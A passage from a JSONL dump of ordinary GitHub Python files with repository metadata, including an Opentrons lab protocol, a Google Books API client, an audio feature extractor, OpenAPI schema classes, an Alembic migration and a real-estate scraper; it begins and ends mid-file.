reagent_rack.wells_by_name()['B1']\n blocking_solution = reagent_rack.wells_by_name()['C1']\n primary_antibody_solution = reagent_rack.wells_by_name()['D1']\n secondary_antibody_solution = reagent_rack.wells_by_name()['A2']\n\n # Perform the experiment\n for i in range(1, 7):\n well = plate_6_well.wells_by_name()[f\"A{i}\"]\n\n # Fixation step\n p300.pick_up_tip()\n p300.aspirate(200, fixative_solution)\n p300.dispense(200, well)\n p300.blow_out(well.top())\n p300.drop_tip()\n\n protocol.delay(minutes=15) # Fixation time (can be adjusted)\n\n # Washing steps (repeat 3 times)\n for wash_round in range(3):\n # Remove fixative solution\n p300.pick_up_tip()\n p300.aspirate(200, well)\n p300.dispense(200, fixative_solution)\n p300.blow_out(fixative_solution.top())\n p300.drop_tip()\n\n # Add permeabilization solution\n p300.pick_up_tip()\n p300.aspirate(200, permeabilization_solution)\n p300.dispense(200, well)\n p300.blow_out(well.top())\n p300.drop_tip()\n\n protocol.delay(minutes=5) # Washing time (can be adjusted)\n\n # Remove permeabilization solution\n p300.pick_up_tip()\n p300.aspirate(200, well)\n p300.dispense(200, permeabilization_solution)\n p300.blow_out(permeabilization_solution.top())\n p300.drop_tip()\n\n # Blocking step\n p300.pick_up_tip()\n p300.aspirate(200, blocking_solution)\n p300.dispense(200, well)\n p300.blow_out(well.top())\n p300.drop_tip()\n\n protocol.delay(minutes=60) # Blocking time (can be adjusted)\n\n # Primary antibody incubation\n p50.pick_up_tip()\n p50.aspirate(50, primary_antibody_solution)\n p50.dispense(50, well)\n p50.blow_out(well.top())\n p50.drop_tip()\n\n protocol.delay(minutes=120) # Primary antibody incubation time (can be adjusted)\n\n # Secondary antibody incubation\n p50.pick_up_tip()\n p50.aspirate(50, secondary_antibody_solution)\n p50.dispense(50, well)\n p50.blow_out(well.top())\n p50.drop_tip()\n\n protocol.delay(minutes=120) # Secondary antibody incubation time (can be adjusted)\n\n # Add your imaging step here if needed (e.g. loading samples into the imaging device)\n","repo_name":"labauto/Inagaki_2023_GPT4OT2","sub_path":"question_and_answer/tmp/tmp_9fc3163b-63a3-47e4-99a4-ad083ca7cd8a.py","file_name":"tmp_9fc3163b-63a3-47e4-99a4-ad083ca7cd8a.py","file_ext":"py","file_size_in_byte":3397,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"46611468558","text":"from __future__ import absolute_import\nfrom __future__ import unicode_literals\n\nimport requests\nfrom fuzzywuzzy import process as fuzz\nfrom fuzzywuzzy.fuzz import token_set_ratio\n\nfrom .. import exceptions\n\n\nGOOGLE_BOOKS_URL = 'https://www.googleapis.com/books/v1/volumes'\n\n\nclass GoogleBooksAPI:\n def __init__(self, match_threshold=70):\n self.match_threshold = match_threshold\n\n\n def _get_single_volume_from_results(self, data, search_str):\n \"\"\"\n Use fuzzywuzzy to reduce multiple search results down to a single one. Use class attrib\n `match_threshold` to determine valid fuzz matches.\n\n :params:\n data (list): list of dicts from Google Books API\n search_str (str): the author/title string searched for\n \"\"\"\n if len(data) == 1:\n return data[0]\n\n choices = {\n '{} {}'.format(' '.join(item['authors']), item['title']):item\n for item in data\n }\n results = fuzz.extract(search_str, choices.keys(), scorer=token_set_ratio)\n\n # abort if best match is below threshold\n if results[0][1] < self.match_threshold:\n raise exceptions.GoogleNoMatchesError\n\n # if more than one item shares highest matching rank, roll with first result\n if results[0][1] == results[1][1]:\n match = data[0]\n else:\n # use fuzzywuzzy comparison match\n match = choices[results[0][0]]\n\n return match\n\n\n def search_by_isbn(self, isbn):\n \"\"\"\n Search Google's Books API for a book by ISBN\n\n :params:\n isbn (str): ISBN 11 or 13\n \"\"\"\n params = {\n 'q': 'isbn:{}'.format(isbn),\n }\n return self._search(params)\n\n\n def search_by_author_title(self, author, title, retry=0):\n \"\"\"\n Search Google's Books API for a book by author/title pair\n\n :params:\n author (str): Book author\n title (str): Book title\n \"\"\"\n params = {\n 'q': 'intitle:{}+inauthor:{}'.format(title, author)\n }\n\n items = self._search(params)\n\n if len(items) == 1:\n return items[0]\n\n # extract best match from results\n return self._get_single_volume_from_results(items, '{} {}'.format(author, title))\n\n\n def _search(self, params):\n \"\"\"\n Search Google's Books API with the supplied query parameters\n\n :params:\n params (str): Search parameters\n \"\"\"\n resp = requests.get(GOOGLE_BOOKS_URL, params=params)\n if resp.status_code > 200:\n raise exceptions.GoogleHttpError\n\n items = []\n\n for item in resp.json()['items']:\n # subtitle is an optional field - concatenate with title and a colon\n subtitle = ''\n if item['volumeInfo'].get('subtitle'):\n subtitle = ': {}'.format(item['volumeInfo'].get('subtitle', ''))\n\n items.append({\n 'title': '{}{}'.format(item['volumeInfo']['title'], subtitle),\n 'authors': item['volumeInfo']['authors'],\n 'description': item['volumeInfo'].get('description'),\n 'publisher': item['volumeInfo'].get('publisher'),\n 'num_pages': item['volumeInfo'].get('pageCount'),\n 'link': item['volumeInfo']['canonicalVolumeLink'],\n 'image_url': item['volumeInfo']['imageLinks']['thumbnail'],\n 'average_rating': item['volumeInfo'].get('averageRating'),\n 'categories': item['volumeInfo'].get('categories'),\n 'identifiers': {\n 'id': item['id'],\n 'etag': item['etag'],\n }\n })\n\n return items\n","repo_name":"oii/ogreserver","sub_path":"ogreserver/sources/google_books.py","file_name":"google_books.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24247615650","text":"#!/usr/bin/env python3\n\nimport os\nimport subprocess\n\npath_to_opensmile = '/Users/danielmora/opensmile'\npath_to_features = '/Users/danielmora/PycharmProjects/digit_recognizer/features/egemapsv01b'\npath_to_wav = '/Users/danielmora/PycharmProjects/digit_recognizer/wav'\n\nfor set in ['training', 'test']:\n for wav in os.listdir(os.path.join(path_to_wav, set)):\n # to extract different features, change .conf file\n command = f'/Users/danielmora/opensmile/SMILExtract \\\n -C /Users/danielmora/opensmile/config/egemaps/v01b/eGeMAPSv01b.conf \\\n -I {os.path.join(path_to_wav, set, wav)} \\\n -csvoutput {os.path.join(path_to_features, wav[:-3]+\"csv\")} \\\n -instname {wav[:-4]}'\n process = subprocess.run([command], shell=True)\n","repo_name":"melanchthon19/digit-recogniser","sub_path":"extract_features.py","file_name":"extract_features.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21817870456","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\n\"\"\"\n UTILITIES - util.py\n\n This file provides useful methods that don't relate\n to any specific class\n\"\"\"\n\n\nclass Util:\n \"\"\"Provides different utility methods\"\"\"\n\n @staticmethod\n def get_num_range(range_string, fill=False):\n \"\"\"Creates a integer list of a number range represented by\n a string and optionally fill it up with numbers\n\n Args:\n range_string (str): String representing number range\n fill (bool): Fill up middle values? (False)\n\n Returns:\n range (list): List representing number range\n \"\"\"\n # Split string and limit resulting list to max. two elements\n num_range = range_string.split('-')[:2]\n\n # Convert list elements to integer\n for i in range(len(num_range)):\n num_range[i] = int(num_range[i])\n\n # Fill list to at least two elements\n while len(num_range) < 2:\n # No element was given\n if not num_range[0]:\n # Add \"1\" as first one\n num_range.append(1)\n\n # Append first element again\n num_range.append(num_range[0])\n\n # Sort list\n num_range.sort()\n\n # Filling up\n if fill is True:\n _num_range = []\n\n for n in range(num_range[0], num_range[-1]+1):\n _num_range.append(n)\n\n num_range = _num_range\n\n return num_range\n","repo_name":"alexanderroidl/hydrabot","sub_path":"hydrabot_py/lib/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25663472760","text":"import random\nimport pathlib\n\nfrom qtpy import QtWidgets, QtCore, QtGui\n\n\n__here__ = pathlib.Path(__file__).parent\n\n\nclass Splash(QtWidgets.QLabel):\n def __init__(self):\n super().__init__()\n index = str(random.randrange(5)).zfill(3)\n path = str(__here__ / \"splash-images\" / f\"{index}.jpg\")\n self.pixmap = QtGui.QPixmap(path)\n\n def paintEvent(self, event):\n size = self.size()\n painter = QtGui.QPainter(self)\n point = QtCore.QPoint(0, 0)\n scaledPix = self.pixmap.scaled(\n size,\n QtCore.Qt.KeepAspectRatio,\n )\n # start painting the label from left upper corner\n point.setX((size.width() - scaledPix.width()) // 2)\n point.setY((size.height() - scaledPix.height()) // 2)\n painter.drawPixmap(point, scaledPix)\n","repo_name":"yaq-project/yaqc-qtpy","sub_path":"yaqc_qtpy/_splash.py","file_name":"_splash.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"28037933250","text":"from textwrap import dedent\n\nfrom rest_framework.schemas.openapi import AutoSchema\n\nfrom ._errors import error_responses\nfrom ._message import message_schema\nfrom ._message import message_with_id_schema\nfrom ._type_query import type_filter_parameter_schema\n\nboilerplate = dedent(\n \"\"\"\\\nProjects are the object under which all data in Tator is grouped, including user\naccess, metadata definitions, media, and annotations. Data does not cross boundaries\nbetween projects.\n\"\"\"\n)\n\n\nclass ProjectListSchema(AutoSchema):\n def get_operation(self, path, method):\n operation = super().get_operation(path, method)\n if method == \"POST\":\n operation[\"operationId\"] = \"CreateProject\"\n elif method == \"GET\":\n operation[\"operationId\"] = \"GetProjectList\"\n operation[\"tags\"] = [\"Tator\"]\n return operation\n\n def get_description(self, path, method):\n long_desc = \"\"\n if method == \"GET\":\n short_desc = \"Get project list.\"\n long_desc = \"Returns all projects that a user has access to.\"\n elif method == \"POST\":\n short_desc = \"Create project.\"\n return f\"{short_desc}\\n\\n{boilerplate}\\n\\n{long_desc}\"\n\n def get_path_parameters(self, path, method):\n return []\n\n def get_filter_parameters(self, path, method):\n return [\n {\n \"name\": \"organization\",\n \"in\": \"query\",\n \"required\": False,\n \"description\": \"Unique integer identifying an organization.\",\n \"schema\": {\"type\": \"integer\", \"minimum\": 1},\n },\n *type_filter_parameter_schema,\n ]\n\n def get_request_body(self, path, method):\n body = {}\n if method == \"POST\":\n body = {\n \"required\": True,\n \"content\": {\n \"application/json\": {\n \"schema\": {\"$ref\": \"#/components/schemas/ProjectSpec\"},\n \"example\": {\n \"name\": \"My Project\",\n \"summary\": \"First project\",\n },\n }\n },\n }\n return body\n\n def get_responses(self, path, method):\n responses = error_responses()\n if method == \"GET\":\n responses[\"200\"] = {\n \"description\": \"Successful retrieval of project list.\",\n \"content\": {\n \"application/json\": {\n \"schema\": {\n \"type\": \"array\",\n \"items\": {\"$ref\": \"#/components/schemas/Project\"},\n }\n }\n },\n }\n elif method == \"POST\":\n responses[\"201\"] = message_with_id_schema(\"project\")\n return responses\n\n\nclass ProjectDetailSchema(AutoSchema):\n def get_operation(self, path, method):\n operation = super().get_operation(path, method)\n if method == \"GET\":\n operation[\"operationId\"] = \"GetProject\"\n elif method == \"PATCH\":\n operation[\"operationId\"] = \"UpdateProject\"\n elif method == \"DELETE\":\n operation[\"operationId\"] = \"DeleteProject\"\n operation[\"tags\"] = [\"Tator\"]\n return operation\n\n def get_description(self, path, method):\n long_desc = \"\"\n if method == \"GET\":\n short_desc = \"Get project.\"\n elif method == \"PATCH\":\n short_desc = \"Update project.\"\n elif method == \"DELETE\":\n short_desc = \"Delete project.\"\n long_desc = dedent(\n \"\"\"\\\n Only project owners may delete a project. Note that deleting a project\n will also delete all media and annotations within a project.\n \"\"\"\n )\n return f\"{short_desc}\\n\\n{boilerplate}\\n\\n{long_desc}\"\n\n def get_path_parameters(self, path, method):\n return [\n {\n \"name\": \"id\",\n \"in\": \"path\",\n \"required\": True,\n \"description\": \"A unique integer identifying a project.\",\n \"schema\": {\"type\": \"integer\"},\n }\n ]\n\n def get_filter_parameters(self, path, method):\n return []\n\n def get_request_body(self, path, method):\n body = {}\n if method == \"PATCH\":\n body = {\n \"required\": True,\n \"content\": {\n \"application/json\": {\n \"schema\": {\"$ref\": \"#/components/schemas/ProjectUpdate\"},\n \"example\": {\n \"name\": \"New name\",\n \"summary\": \"New summary\",\n },\n }\n },\n }\n return body\n\n def get_responses(self, path, method):\n responses = error_responses()\n if method == \"GET\":\n responses[\"200\"] = {\n \"description\": \"Successful retrieval of project.\",\n \"content\": {\n \"application/json\": {\n \"schema\": {\n \"$ref\": \"#/components/schemas/Project\",\n }\n }\n },\n }\n elif method == \"PATCH\":\n responses[\"200\"] = message_schema(\"update\", \"project\")\n elif method == \"DELETE\":\n responses[\"200\"] = message_schema(\"deletion\", \"project\")\n return responses\n","repo_name":"cvisionai/tator","sub_path":"api/main/schema/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":5534,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"52"} +{"seq_id":"32540624628","text":"import pandas as pd \n\ndf = pd.read_csv('titanic.csv', index_col = 'PassengerId')\nprint(\"Male:\", df['Sex'].value_counts()['male'])\nprint(\"Female:\", df['Sex'].value_counts()['female'])\n\nprint(\"Percent survived:\", sum(df[\"Survived\"])/ len(df[\"Survived\"]) * 100)\nprint(\"Percent of first class:\", df[\"Pclass\"].value_counts()[1]/ len(df[\"Pclass\"]) * 100)\n\nprint(\"Age avg:\", df[\"Age\"].mean())\nprint(\"Age median:\", df[\"Age\"].median())\n\n\nprint(df[['SibSp', 'Parch']].corr())\n\n\n\"\"\"\nПоиск самого популярного женского имени\n\"\"\"\nnames = list(df[df['Sex'] == 'female']['Name'])\nunique_names = {}\nfor name in names:\n if '(' in name:\n prep = name.split('(')[-1].split() \n name = prep[:-1] + [prep[-1][:-1]]\n else:\n name = name.split('.')[1].split()\n for n in name:\n if n in unique_names:\n unique_names[n] += 1\n else:\n unique_names[n] = 1\nunique_tuple = sorted([(v, k) for k, v in unique_names.items()], reverse=True)\nprint(unique_tuple[:5])\n\n","repo_name":"vlasove/mlds","sub_path":"voroncov/W1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24786215336","text":"from __future__ import annotations\n\nimport collections\nimport decimal\nimport functools\nimport numbers\n\nimport dask.dataframe as dd\nimport dask.dataframe.groupby as ddgb\nimport numpy as np\nimport pandas as pd\n\nimport ibis.expr.operations as ops\nfrom ibis.backends.dask.dispatch import execute_node\nfrom ibis.backends.dask.execution.util import make_selected_obj\nfrom ibis.backends.pandas.core import numeric_types\n\n\n@execute_node.register(ops.Negate, dd.Series)\ndef execute_series_negate(_, data, **kwargs):\n return -data\n\n\n@execute_node.register(ops.Negate, ddgb.SeriesGroupBy)\ndef execute_series_group_by_negate(op, data, **kwargs):\n return execute_series_negate(op, make_selected_obj(data), **kwargs).groupby(\n data.index\n )\n\n\ndef call_numpy_ufunc(func, op, data, **kwargs):\n if data.dtype == np.dtype(np.object_):\n return data.apply(\n functools.partial(execute_node, op, **kwargs),\n meta=(data.name, \"object\"),\n )\n return func(data)\n\n\n@execute_node.register(ops.Unary, dd.Series)\ndef execute_series_unary_op(op, data, **kwargs):\n op_type = type(op)\n if op_type == ops.BitwiseNot:\n function = np.bitwise_not\n else:\n function = getattr(np, op_type.__name__.lower())\n return call_numpy_ufunc(function, op, data, **kwargs)\n\n\n@execute_node.register(ops.Acos, dd.Series)\ndef execute_series_acos(_, data, **kwargs):\n return np.arccos(data)\n\n\n@execute_node.register(ops.Asin, dd.Series)\ndef execute_series_asin(_, data, **kwargs):\n return np.arcsin(data)\n\n\n@execute_node.register(ops.Atan, dd.Series)\ndef execute_series_atan(_, data, **kwargs):\n return np.arctan(data)\n\n\n@execute_node.register(ops.Cot, dd.Series)\ndef execute_series_cot(_, data, **kwargs):\n return 1.0 / np.tan(data)\n\n\n@execute_node.register(ops.Atan2, dd.Series, dd.Series)\n@execute_node.register(ops.Atan2, numeric_types, dd.Series)\n@execute_node.register(ops.Atan2, dd.Series, numeric_types)\ndef execute_series_atan2(_, y, x, **kwargs):\n return np.arctan2(y, x)\n\n\n@execute_node.register((ops.Ceil, ops.Floor), dd.Series)\ndef execute_series_ceil(op, data, **kwargs):\n return_type = np.object_ if data.dtype == np.object_ else np.int64\n func = getattr(np, type(op).__name__.lower())\n return call_numpy_ufunc(func, op, data, **kwargs).astype(return_type)\n\n\ndef vectorize_object(op, arg, *args, **kwargs):\n # TODO - this works for now, but I think we can do something much better\n func = np.vectorize(functools.partial(execute_node, op, **kwargs))\n out = dd.from_array(func(arg, *args), columns=arg.name)\n return out\n\n\n@execute_node.register(\n ops.Log,\n dd.Series,\n (dd.Series, pd.Series, numbers.Real, decimal.Decimal, type(None)),\n)\ndef execute_series_log_with_base(op, data, base, **kwargs):\n if data.dtype == np.dtype(np.object_):\n return vectorize_object(op, data, base, **kwargs)\n\n if base is None:\n return np.log(data)\n return np.log(data) / np.log(base)\n\n\n@execute_node.register(ops.Ln, dd.Series)\ndef execute_series_natural_log(op, data, **kwargs):\n if data.dtype == np.dtype(np.object_):\n return data.apply(\n functools.partial(execute_node, op, **kwargs),\n meta=(data.name, \"object\"),\n )\n return np.log(data)\n\n\n@execute_node.register(ops.Quantile, dd.Series, numeric_types, (dd.Series, type(None)))\ndef execute_series_quantile(op, data, quantile, mask, **_):\n if mask is not None:\n data = data.loc[mask]\n return data.quantile(q=quantile)\n\n\n@execute_node.register(ops.Quantile, ddgb.SeriesGroupBy, numeric_types, type(None))\ndef execute_series_quantile_group_by(op, data, quantile, mask, **_):\n raise NotImplementedError(\n \"Quantile not implemented for Dask SeriesGroupBy, Dask #9824\"\n )\n\n\n@execute_node.register(\n ops.MultiQuantile, dd.Series, collections.abc.Sequence, type(None)\n)\ndef execute_series_quantile_sequence(op, data, quantile, mask, **_):\n return list(data.quantile(q=quantile))\n\n\n# TODO - aggregations - #2553\n@execute_node.register(\n ops.MultiQuantile, ddgb.SeriesGroupBy, collections.abc.Sequence, type(None)\n)\ndef execute_series_quantile_groupby(op, data, quantile, mask, aggcontext=None, **_):\n def q(x, quantile):\n result = x.quantile(quantile).tolist()\n return [result for _ in range(len(x))]\n\n return aggcontext.agg(data, q, quantile)\n\n\n@execute_node.register(ops.Round, dd.Series, (dd.Series, np.integer, type(None), int))\ndef execute_round_series(op, data, places, **kwargs):\n if data.dtype == np.dtype(np.object_):\n return vectorize_object(op, data, places, **kwargs)\n result = data.round(places or 0)\n return result if places else result.astype(\"int64\")\n","repo_name":"ibis-project/ibis","sub_path":"ibis/backends/dask/execution/numeric.py","file_name":"numeric.py","file_ext":"py","file_size_in_byte":4715,"program_lang":"python","lang":"en","doc_type":"code","stars":3246,"dataset":"github-code","pt":"52"} +{"seq_id":"29899184424","text":"import os\n\nbook = {}\ncondition = True\nwhile condition:\n name = input(\"Auctioneer name: \").lower()\n money = int(input(\"Auctioning money :$ \"))\n book[name] = money\n ask = input(\"Do you have more Auctioneers? Yes/no \").lower()\n if ask == 'yes':\n condition = True\n os.system('cls')\n else:\n condition = False\n os.system('cls')\n\nvalue = []\nfor key in book:\n value.append(book[key])\n\nprint(f\"\\n\\nCongratulation {name}, you wins the auction by auctioning value ${max(value)}.\")\n","repo_name":"ShubhamOulkar/100_python_projects","sub_path":"Auction_program.py","file_name":"Auction_program.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"73102770084","text":"import wikipedia\nimport sys\nfrom wikipedia.exceptions import DisambiguationError\n\nWIKI_HOST = \"https://en.wikipedia.org\"\n\ndef search_results(q_term):\n print(\"Searching for page: \" + q_term)\n try:\n page = wikipedia.page(q_term)\n return [page.url]\n except DisambiguationError as e:\n page_list = [WIKI_HOST + p.get('href') for p in e.options]\n return page_list\n\n\n","repo_name":"jamespeacock/wiki-search","sub_path":"wiki_search.py","file_name":"wiki_search.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72190983524","text":"import json\n\n\nclass Loading:\n def __init__(self, models, result):\n self.result = not int(result)\n self.models_ids = list()\n for x in models:\n self.models_ids.append(int(x))\n\n\n def __str__(self):\n return \"Models:{0}, Result: {1}\".format(self.models_ids, self.result)\n\n\nclass Model:\n def __init__(self, name, height, width, weight):\n self.model_name = name\n self.height = height\n self.width = width\n self.weight = weight\n def __str__(self):\n return \"{0}: height:{1}, width:{2}, weight:{3}\".format(self.model_name, self.height, self.width, self.weight)\n\n\ndef get_data():\n file = open(\"./data\")\n data = list()\n for line in file.readlines():\n data.append(Loading(list(line[:-5].split(' ')),line[-2:-1]))\n\n return data\n\ndef get_models_info():\n preferable_models = (33, 16, 10, 5, 4, 8, 11, 12, 1, 3, 15, 6, 13)\n models_info = list()\n file =json.load(open(\"./models_data\"))\n for model_id in preferable_models:\n info = file[model_id-1]\n models_info.append(Model(info[\"brandName\"]+\" \" +info[\"name\"], info[\"height\"], info[\"width\"], info[\"weight\"]))\n\n\n return models_info","repo_name":"HlibHlushko/LoadingMasterNN","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4918811640","text":"\"\"\"Drop collection arch fields\n\nRevision ID: 2176056cfb43\nRevises: 4852a7975500\nCreate Date: 2016-05-23 10:55:31.312052\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '2176056cfb43'\ndown_revision = '4852a7975500'\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('collection', 'resolution_arches')\n op.drop_column('collection', 'resolve_for_arch')\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('collection', sa.Column('resolve_for_arch', sa.VARCHAR(), server_default=sa.text(u\"'x86_64'::character varying\"), autoincrement=False, nullable=False))\n op.add_column('collection', sa.Column('resolution_arches', sa.VARCHAR(), server_default=sa.text(u\"'x86_64,i386'::character varying\"), autoincrement=False, nullable=False))\n ### end Alembic commands ###\n","repo_name":"fedora-infra/koschei","sub_path":"alembic/versions/2176056cfb43_drop_collection_arch_fields.py","file_name":"2176056cfb43_drop_collection_arch_fields.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"52"} +{"seq_id":"73521779684","text":"\"\"\"\nZbiór przedziałów {[a1, b1], ..., [an, bn]}, każdy przedział należy do [0, 1]. Opisać algorytm który\nsprawdzi czy jest możliwy taki wybór przedziałów, aby cały przedział [0, 1] zawierał się w\nwybranych odcinkach. Przedział ma składać się z jak najmniejszej ilości odcinków.\n\"\"\"\n\n\n\"\"\"\nAlgorytm zachłanny: sortujemy przedziały po pierwszej współrzędnej (O(nlogn)). Następnie sprawdzamy czy początek pierwszego\nprzedziału jest w 0, jeśli nie to kończymy algorytm, jeśli tak, to zapamiętujemy koniec rozważanego przedziału i sprawdzamy\nkolejne przedziały. Z tych przedziałów, które pierwszą współrzędną mają mniejszą (lub równą) niż druga współrzędna zapamiętanego przedziału,\nzapamiętujemy ten, który ma drugą współrzędną największą, następnie zapamiętujemy tą współrzędną. Proces powtarzamy, jeśli \npodczas przeszukiwania nie natrafimy na żaden przedział, to znaczy że przedział nie może zostać wypełniony (istnieje przerwa\nmiędzy przedziałami), a jeśli największa druga współrzędna z przedziałów jest mniejsza niż ta, do której porównywamy, również\noznacza, że nie da się wypełnić [0, 1] tymi przedziałami. Ostatnia zapamiętana druga współrzędna powinna być równa 1 żeby zwrócić\nprawdę.\nAnaliza złożoności: sortowanie nlogn, przejście i wybór przedziałów liniowe (n).\n\"\"\"\nfrom random import uniform\n\ndef filling_a_span(list):\n n = len(list)\n\n def quicksort1(Tab, p, r):\n def quicksort(Tab, p, r):\n while p < r:\n q = partition(Tab, p, r)\n quicksort(Tab, p, q - 1)\n p = q + 1\n\n def partition(Tab, p, r):\n x = Tab[r][0]\n i = p - 1\n for j in range(p, r):\n if Tab[j][0] < x:\n i += 1\n Tab[i], Tab[j] = Tab[j], Tab[i]\n Tab[i + 1], Tab[r] = Tab[r], Tab[i + 1]\n return i + 1\n\n quicksort(Tab, p, r)\n\n quicksort1(list, 0, n-1)\n print(list)\n if list[0][0] != 0:\n return False\n\n if list[0][1] == 1:\n return True\n\n max = 0\n current = list[0][1]\n counter = 1\n result = [list[0]]\n rem = []\n for x in range(1, n):\n # print(result, max, current, list[x])\n print(result)\n if list[x][0] <= current:\n if list[x][1] > max:\n max = list[x][1]\n rem = list[x]\n elif list[x][0] > current:\n if max == 0:\n return False\n else:\n current = max\n result.append(rem)\n\n if current == 1:\n return True, counter + 1, result\n\n max = 0\n if list[x][0] <= current:\n max = list[x][1]\n rem = list[x]\n counter += 1\n\n counter += 1\n\n if max == 1:\n result.append(rem)\n return True, counter, result\n\n return False\n\n\nlist = [[0.2, 0.4], [0.1, 0.3], [0.5, 0.8], [0.6, 0.7], [0.9, 1], [0.6, 0.8], [0, 0.6], [0.7, 1]]\na = uniform(0, 1)\nb = uniform(0, 1)\nc = uniform(0, 1)\nd = uniform(0, 1)\ne = uniform(0, 1)\nf = uniform(0, 1)\ng = uniform(0, 1)\nh = uniform(0, 1)\na1 = uniform(a, 1)\nb1 = uniform(b, 1)\nc1 = uniform(c, 1)\nd1 = uniform(d, 1)\ne1 = uniform(e, 1)\nf1 = uniform(f, 1)\ng1 = uniform(g, 1)\nh1 = uniform(h, 1)\nstart = uniform(0.1, 1)\nstop = uniform(0.6, 1)\nlist1 = [[a, a1], [b, b1], [c, c1], [d, d1], [stop, 1], [e, e1], [0, start], [f, f1], [g, g1], [h, h1]]\nprint(filling_a_span(list1))\n","repo_name":"Gygrus/WDI-ASD-course-Python","sub_path":"Semestr II/Kolokwia/2015-2016/Kolos 3, zadanie 3 - przedział [0, 1], czy można wypełnić.py","file_name":"Kolos 3, zadanie 3 - przedział [0, 1], czy można wypełnić.py","file_ext":"py","file_size_in_byte":3585,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29386349459","text":"import ScrapingUtilities as Su\nfrom concurrent.futures import ThreadPoolExecutor\nimport requests as re\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport datetime\nfrom tqdm import tqdm\n\n\ndef run_it_all():\n try:\n complete_dataframe = pd.DataFrame()\n cities = [\"alba?id=82496862\", \"arad?id=82494820\", \"arges?id=82494624\", \"bacau?id=82495016\", \"bihor?id=82494332\",\n \"bistrita-nasaud?id=82501822\", \"botosani?id=82497568\", \"brasov?id=82494170\", \"braila?id=82495458\",\n \"bucuresti-ilfov?id=82493726\", \"buzau?id=82495122\", \"caras-severin?id=82495494\", \"calarasi?id=82524120\",\n \"cluj?id=82493680\", \"constanta?id=82493534\", \"covasna?id=82500712\", \"dambovita?id=82495344\",\n \"dolj?id=82493886\", \"galati?id=82493530\", \"giurgiu?id=82495198\", \"gorj?id=82494826\",\n \"harghita?id=82505524\",\n \"hunedoara?id=82495282\", \"ialomita?id=82499146\", \"iasi?id=82493900\", \"maramures?id=82496128\",\n \"mehedinti?id=82495778\", \"mures?id=82493622\", \"neamt?id=82502954\", \"olt?id=82500594\",\n \"prahova?id=82494706\",\n \"satu-mare?id=82498096\", \"salaj?id=82506196\", \"sibiu?id=82494094\", \"suceava?id=82495730\",\n \"teleorman?id=82500592\", \"timis?id=82493432\", \"tulcea?id=82495302\", \"vaslui?id=82495238\",\n \"valcea?id=82495108\", \"vrancea?id=82495300\"]\n for city in tqdm(cities, desc=\"Running...\"):\n base_url = \"https://www.imobiliare.ro/vanzare-apartamente/\" + city\n page_soup = BeautifulSoup(re.get(base_url).content, 'html.parser')\n anunturi = page_soup.find(class_=\"ultima butonpaginare double\")\n if anunturi is None:\n pagina_max = 1\n else:\n attribute_dictionary = anunturi.attrs\n pagina_max = int(attribute_dictionary[\"data-pagina\"])\n\n with ThreadPoolExecutor(max_workers=100) as p:\n # start_time = time.time()\n results = p.map(Su.run_page_beautifulsoup, [city+\"&\"]*pagina_max, range(1, pagina_max+1))\n for result in results:\n complete_dataframe = pd.concat([result, complete_dataframe], ignore_index=True)\n # print(f\"{(time.time() - start_time):.2f} seconds\")\n #\n # for i in range(1, 21):\n # print(\"Run number:\", i)\n # start_time = time.time()\n # result = Su.run_page_beautifulsoup(city, i)\n # complete_dataframe = pd.concat([result, complete_dataframe], ignore_index=True)\n # print(f\"{(time.time() - start_time):.2f} seconds\")\n complete_dataframe.to_csv(\"Reports/\" + datetime.datetime.now().strftime(\"%m-%d-%Y\") + \".csv\", index=False)\n except:\n run_it_all()\n\nif __name__ == \"__main__\":\n run_it_all()","repo_name":"VaseSimion/ImobiliareLaVedere","sub_path":"ScrapingWorkfile.py","file_name":"ScrapingWorkfile.py","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32236651848","text":"# isort: off\nimport asyncio\nfrom os import environ\n\nif environ.get(\"TEST_DATABASE_URL\"):\n environ[\"DATABASE_URL\"] = environ[\"TEST_DATABASE_URL\"]\n\n\nimport pytest\nimport pytest_asyncio\nfrom accentdatabase.config import config\nfrom accentdatabase.engine import engine\nfrom accentdatabase.session import get_session\nfrom accentdatabase.testing import recreate_postgres_database\nfrom alembic import command\nfrom alembic.config import Config\nfrom httpx import AsyncClient\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom sqlalchemy.orm import sessionmaker\n\nfrom app.database import tables\n\nfrom app.main import app\n\n\ndef 